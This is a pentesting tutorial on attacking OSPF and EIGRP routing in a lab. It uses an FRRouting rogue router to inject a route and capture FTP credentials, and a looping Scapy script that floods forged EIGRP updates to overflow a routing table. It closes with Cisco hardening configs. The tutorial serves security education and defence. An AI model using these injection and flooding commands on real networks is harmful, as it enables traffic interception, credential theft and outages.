Routing nightmare. How to pentest OSPF and EIGRP dynamic routing protocols

The magic and charm of dynamic routing protocols can be deceptive: admins trust them implicitly and often forget to properly configure security systems embedded in these protocols. In this article, I will explain what nightmares can occur if the network admin doesn’t take a good care of the security of OSPF and EIGRP routing domains.

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

All major corporate networks use dynamic routing. Routers on the network exchange routing information with each other automatically so that the network admin doesn’t have to set up all their routes manually. In most cases, the admin doesn’t configure the protective mechanisms at all. And this opens the way for exploitation.

info

Both OSPF and EIGRP belong to the class of interior gateway protocols (IGP). Such protocols are used to transmit routing information within the same Autonomous System (AS). For convenience purposes, you can imagine it as a network of some organization.

Problems, impact, and weapon

OSPF

OSPF (Open Shortest Path First) belongs to a type of protocols based on link state tracking. Attacking OSPF is a bit more difficult job in comparison with its relative EIGRP. Two things can complicate an attack:

  • multiple OSPF zones. Engineers can design an OSPF routing domain with multiple zones to reduce the load on computing resources of the routers. This must be taken into account when you penetrate into an OSPF routing domain. Also keep in mind that packets can be transmitted between these zones. For instance, if you are going to perform a route injection; and 
  • lack of response to queries. To connect to a routing domain, the attacker must ensure that the fake router generates and receives Hello messages from neighbors and simulates the establishment of neighborship with them. Otherwise, the fake router will be recognized ‘dead’ and excluded from the routing domain, thus, making it impossible for the attacker to take further steps.
Establishing OSPF neighborship
Establishing OSPF neighborship

The best way to attack an OSPF domain is to gain control over a legitimate router on the network. Alternatively, you can create an ‘evil’ virtual router on your side and connect to the domain. However, to do this, have to parse OSPF multicast packets and examine the following parameters in the packet:

  • OSPF Hello Interval;
  • OSPF Dead Interval; and 
  • presence of authentication.

Even if OSPF is protected by authentication, and the passwords are stored as MD5 hashes, there is still a chance for the attacker to guess them.

Password to an OSPF domain has been cracked using the Loki tool
Password to an OSPF domain has been cracked using the Loki tool

EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) belongs to the class of distance-vector protocols. It was developed by Cisco Systems as a replacement for the IGRP protocol. EIGRP routers exchange routing information using the Diffuse Update Algorithm (DUAL) to plot routes within the same AS. EIGRP stores all available backup routes to destination networks in the routing table, which makes it possible to quickly switch to a backup route if necessary.

Establishing EIGRP neighborship
Establishing EIGRP neighborship

info

Did you know that EIGRP is no longer a Cisco proprietary protocol and it’s now open to other network equipment vendors? EIGRP became an open standard in 2013, and the respective documentation RFC 7868 was published in 2016.

To connect to an EIGRP routing domain, the attacker must know the autonomous system number. It can be extracted, for instance, from a traffic dump using Wireshark. Unlike an OSPF domain that can be divided into multiple routing zones, an EIGRP autonomous system is flat: if you make a route injection, your route will likely spread throughout the entire domain.

Impact

Attacks ON Dynamic routing can be divided into three types:

  1. Network enumeration. If an attacker connects to the routing domain, they can perform network reconnaissance and discover some subnets. This is a rather useful trick since classical scans (e.g. with Nmap) take a long time. In addition, they can trigger IDS/IPS security systems. After connecting to a routing domain, you can collect information about subnets advertised by neighboring routers. Note that this method doesn’t guarantee the detection of all subnets in the organization. But it can bring you an easier win when you conduct a pentesting study.
  2. MITM (man in the middle). In essence, you inject a route to intercept traffic from the target host or network. After connecting to the routing domain, you can make an advertisement in the domain that literally looks as follow: “Dear all, the host whose IP address is 192.168.1.43/24 is now accessible via me, 192.168.1.150.” The routers in the domain will accept the new information and add the route you have advertised to the routing table. Important: routers use metrics to make routing decisions. If your route is worse than others in terms of path cost, it won’t be included in the routing table. Why? Because the routing table stores only the best paths to destination networks.
  3. DoS (Denial of Service). Routing table overflow: all router’s CPU and RAM resources are depleted. If the routing table is overflowed, it becomes impossible to add a new legitimate route to it. The router won’t be able to add to its table the route to a new network that has just appeared.

Lethal weapon: FRRouting

FRRouting is an open source solution that creates a virtual router in Unix/Linux. The virtual router supports such protocols as BGP, OSPF, EIGRP, RIP, etc.

Using FRRouting, you can deploy a ‘rogue’ router on your side, start routing, and connect to the target routing domain. Why is this required? Because, if you perform a route injection without joining the domain and establishing a neighborship, then the routes you advertise won’t be included into the neighbors’ routing tables. Instead, they will just disappear.

www

I strongly recommend reviewing the FRRouting documentation; it addresses all important aspects, including installation and configuration.

Configuring FRRouting

First, you have to enable daemons in the daemons configuration file. You will need the ospfd and eigrpd daemons. It’s also necessary to enable the staticd daemon to ensure that custom static routes are redistributed correctly.

nano /etc/frr/daemons
ospfd=yes
eigrpd=yes
staticd=yes

Then you set a password to connect to the router control panel via VTY lines:

nano /etc/frr/frr.conf
password letm3in

Finally, you enable traffic forwarding. By default, it’s disabled in Linux distributions.

sudo sysctl -w net.ipv4.ip_forward=1

Starting the frr daemon.

systemctl start frr
Status of the FRRouting daemon
Status of the FRRouting daemon

Using the vtysh command, you access the control panel of the FRRouting virtual router.

Logging into the control panel
Logging into the control panel

Virtual lab

The networks shown below will be used as test polygons.

OSPF-based network
OSPF-based network
EIGRP-based network
EIGRP-based network
IP addressing of the polygon
IP addressing of the polygon

In the context of an attack on OSPF, I will examine a route injection with subsequent traffic interception. With regards to EIGRP, I will explain how to deliver a destructive attack involving a routing table overflow (to avoid demonstrating the same attack). Thus, two attack variants will be addressed. OSPF can be attacked in the same way as EIGRP. However, keep in mind that destructive attacks are less practical in terms of production. Perhaps, such scenario can be useful for the Red Team as a diversionary maneuver…

Route injection and traffic interception in an OSPF domain

To successfully perform route injection, you have to connect to the OSPF routing domain and advertise the network. Specify area 0.

c0ldheim@kali:~$ sudo vtysh
kali# conf t
kali(config)# router ospf
kali(config-router)# network 172.20.20.50/32 area 0.0.0.0
Traffic dump after connecting to the OSPF domain
Traffic dump after connecting to the OSPF domain

Enable redistribution of static routes with the lowest metrics so that the injected route has the lowest cost.

kali(config-router)# redistribute static metric 0

Advertise a static route in the OSPF domain: “The host whose IP address is 172.20.20.20 is now accessible via me, 172.20.20.50.”

kali(config)# ip route 172.20.20.20/32 eth0
Traffic dump after the injection into the OSPF domain
Traffic dump after the injection into the OSPF domain

Checking the routing table on router R2:

R2#show ip route
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 10.1.1.0/24 is directly connected, GigabitEthernet0/0
L 10.1.1.2/32 is directly connected, GigabitEthernet0/0
172.20.0.0/16 is variably subnetted, 4 subnets, 2 masks
C 172.20.20.0/24 is directly connected, GigabitEthernet0/2
O E2 172.20.20.20/32
[110/0] via 172.20.20.50, 00:02:27, GigabitEthernet0/2
L 172.20.20.254/32 is directly connected, GigabitEthernet0/2
O 172.20.30.0/24 [110/2] via 10.1.1.3, 01:08:17, GigabitEthernet0/0
R2#

As you can see, the route injection was successful. R2 now believes that the host at 172.20.20.20 is accessible via your attacking machine.

Next, let’s try to connect from the DevOps host to the FTP server at 172.20.30.100.

Connecting to FTP
Connecting to FTP

As a result, you have squeezed between the host and the FTP server and intercepted the unencrypted credentials.

Dump of unencrypted FTP traffic
Dump of unencrypted FTP traffic

Route injection and routing table overflow in an EIGRP domain

First, you connect to an autonomous EIGRP system and advertise a network.

c0ldheim@kali:~$ sudo vtysh
kali# conf t
kali(config)# router eigrp 1
kali(config-router)# network 172.20.20.50/32
Traffic dump after connecting to an EIGRP domain
Traffic dump after connecting to an EIGRP domain

This time, I am going to use the Scapy networking library to inject EIGRP routes.

c0ldheim@kali:~$ sudo scapy3
>>> from scapy.contrib.eigrp import * # Import module to work with EIGRP headers
>>> frame = Ether(dst="01:00:5e:00:00:0a") # Build Ethernet frame with the MAC address of the multicast advertisement destination
>>> ip = IP(src="172.20.20.50", dst="224.0.0.10") # Build IP packet with the IP address of the multicast EIGRP advertisement destination
>>> eigrp = EIGRP(opcode=1, asn=1, seq=0, ack=0, tlvlist=[EIGRPExtRoute(dst=RandIP(), nexthop="172.20.20.50")]) # Build EIGRP packet with the Update option
>>> crafted = frame/ip/eigrp # Assemble the three layers together
>>> sendp(crafted, loop=1, iface="eth0") # Put on a loop the transmission of the assembled malicious EIGRP packet
Traffic dump after the injection in the EIGRP domain
Traffic dump after the injection in the EIGRP domain

If you check the router control panel, you’ll see that the CPU load has increased significantly reaching 87%.

CPU load at the time of overflow
CPU load at the time of overflow
Routing table after the overflow
Routing table after the overflow
R2#show ip route summary
IP routing table name is default (0x0)
IP routing table maximum-paths is 32
Route Source Networks Subnets Replicates Overhead Memory (bytes)
connected 0 6 0 408 1080
static 1 0 0 68 180
application 0 0 0 0 0
eigrp 1 481 3088 0 328348 642420
internal 1192 358080
Total 1674 3094 0 328824 1001760

If the routing table is overflowed, the router cannot add new routes to its routing table.

How to prevent attacks on routing domains

Use passive interfaces. Configuring passive interfaces in the dynamic routing context prevents the router from sending advertisements via certain interfaces. By default (i.e. if you don’t configure passive interfaces), it sends advertisements to all interfaces, which puts the routing domain at great risk. A legitimate user on the network can deploy a virtual router in the same way as shown above and attack the routing domain.

info

In this article, I stick to the Cisco IOS CLI principles and commands.

A configuration example for OSPF:

R2#conf t # Enter global configuration mode
R2(config)# router ospf 1 # Enter the OSPF configuration mode as process 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive

An example for EIGRP:

R2#conf t # Enter global configuration mode
R2(config)# router eigrp 1 # Enter the EIGRP configuration mode in autonomous system 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive

Use Authentication. The use of authentication in routing domains ensures that only authorized, legitimate routers can log in. Authentication involves passwords. If you want to secure the routing domain using authentication, make sure the passwords you use are strong enough. Keep in mind that they are hashed using cryptographic hash functions, and the attacker can read hash values from the traffic dump and brute-force a password. Having a password, the attacker can easily connect to the routing domain.

Configuring authentication for OSPF using MD5:

R2#conf t # Enter global configuration mode
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip ospf authentication message-digest # Enable MD5 authentication
R2(config-if)# ip ospf message-digest-key 1 md5 y0ur_f4ult # Set password with key-id 1

Configuring authentication for EIGRP using key-chain and MD5:

R2#conf t # Enter global configuration mode
R2(config)# key chain SecureRouting # Create a key chain called SecureRouting
R2(config-keychain)# key 1 # Create first key
R2(config-keychain-key)# key-string y0ur_f4ult # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config-keychain)# key 2 # After the expiry of the first key, the second key will be used automatically. Create second key
R2(config-keychain-key)# key-string y0ur_des1re # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip authentication mode eigrp 1 md5 # Enable MD5 authentication for autonomous system EIGRP 1
R2(config-if)# ip authentication key-chain eigrp 1 SecureRouting # Specify key-chain to be used for authentication in autonomous system EIGRP 1

Conclusions

This article analyzes attack scenarios targeting the OSPF and EIGRP dynamic routing protocols. Based on my personal pentesting experience, in most cases, network admins don’t configure protection mechanisms embedded in these protocols. The most common OSPF/EIGRP configuration neither does include authentication, nor its passive interfaces are configured. This puts the security of the local network at great risk.

Hopefully, the above information will be of interest both for pentesters (who can implement these attacks) and network admins (who can boost the security of their routing domains).

Good luck!


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>